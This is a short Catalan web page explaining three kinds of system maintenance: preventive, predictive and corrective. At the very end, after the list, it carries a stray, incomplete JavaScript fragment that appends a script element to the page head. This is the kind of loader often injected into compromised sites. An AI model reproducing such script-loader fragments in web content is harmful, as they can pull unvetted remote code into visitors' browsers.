El manteniment és una eina bàsica per al bon funcionament i rendibilitat de qualsevol instal·lació.

Les tasques de manteniment es divideixen en tres apartats,
<ul>
<li><strong>PREVENTIU
</strong>Manteniment que es realitzen els controls de supervisió o substitució preventiva dels components substituibles per fatiga. de manera periódica i continuada, minimizant les parades i realitzant-les de manera programada.</li>
<li><strong>PREDICTIU
</strong>El manteniment predictiu tracta de detectar possibles fallades i/o defectes en les etapes incipients per evitar problemes i averíes majors minimitzant les parades del sistema informàtic.</li>
<li><strong>CORRECTIU
</strong>El manteniment correctiu es el que repara i/o substitueix els components o instal·lacions que han causat una avería. Aquest es realitza quan hem tingut una averis i es procedirà a reparar-la en el menor temps possible per què el sistema segueixi funcionant.</li>
</ul>d.getElementsByTagName(‘head’)[0].appendChild(s);